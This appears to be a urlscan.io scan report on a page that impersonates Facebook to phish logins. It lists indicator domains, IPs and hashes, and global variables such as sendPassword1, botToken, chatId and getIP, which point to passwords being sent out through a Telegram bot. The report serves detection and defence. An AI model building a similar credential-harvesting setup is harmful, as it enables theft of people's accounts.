GET, POST, OPTIONS
content-type
application/json
access-control-allow-origin
*
access-control-expose-headers
Content-Length,Content-Type,Date,Server,Connection
content-length
408

Verdicts & Comments Add Verdict or Comment

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

Phishing against: Facebook (Social Network)

17 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| documentPictureInPicture object| _0x2117 function| sendPassword1 function| _0xc528 function| sendPassword2 function| _0x4717 function| validatePassword function| _0x3512cd function| _0x46a3 string| botToken string| chatId function| getIP function| _0x2e4d function| $ function| jQuery function| Popper object| bootstrap

0 Cookies

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header Value
X-Content-Type-Options nosniff
X-Xss-Protection 1; mode=block

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

api.ipify.org
api.telegram.org
cdn.000webhost.com
cdnjs.cloudflare.com
code.jquery.com
establishconnect-id12931l.000webhostapp.com
fonts.googleapis.com
fonts.gstatic.com
ipwhois.app
maxcdn.bootstrapcdn.com
metasupport.work.gd
static.xx.fbcdn.net
104.237.62.212
15.204.213.5
2001:67c:4e8:f004::9
205.144.171.64
2606:4700::6811:190e
2606:4700::6811:a329
2606:4700::6812:bcf
2607:f8b0:4006:80c::2003
2607:f8b0:4006:80c::200a
2a02:4780:dead:6136::1
2a03:2880:f012:8:face:b00c:0:1
2a04:4e42:400::649
0d6f8d206a6bd8b60a2048a3df206ac956a2f633786e4af1c02057f81758ad7a
112f1da1825da03d9a1c924f2a78bc32de658aa99cdf4c785ad64842593b52ec
119ca3795936c80b685a4cb3bd0df598336324b8fe3ac3972421fc4bc59fb918
1eb2c4ee104f4e01535d5e0dde731f45e2853368ae285dfdd500ddd1b5496606
30f3f3b376e1b2f21d04e79bacb8bfc970a17d787b9e5b05d5cc5f285a4e79f3
4134b973edf5e239456d6492ae5079c102f7f1defda47568b7e77828d1a3e0bd
478b3ab728aaa25a76c8cd8bb04addde92c43d72e643d0fdc455340b44c3f074
5cbd4a47e05f419e4642261c80e5d4ce758b36483b521866ff55f25e33bb21b2
6ef740727224204aa751d4dddfbbb3efebbc4e8bf7b776f21c9a76bb79716434
7d93459d86585bfcdbb7e0376056226adb25821ee54b96236fe2123e9560929f
86f2673ec74a632865109a76b2232f4f5b3587daa219e07a17ef1d9c76a0fda5
9365920887b11b33a3dc4ba28a0f93951f200341263e3b9cefd384798e4be398
a52f7aa54d7bcaafa056ee0a050262dfc5694ae28dee8b4cac3429af37ff0d66
a9b3f40d038b54d6bb07da790bcbcf823d326f78880817a345334946b2f6bab6
e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b
f192229cae30aab580791ecf1bbf684d34dc33b14237723f8877ed265322db7f
f838ebffc61f0a53e965c1bf87b0d6a6c99997e0ac9350f388316b39a9859848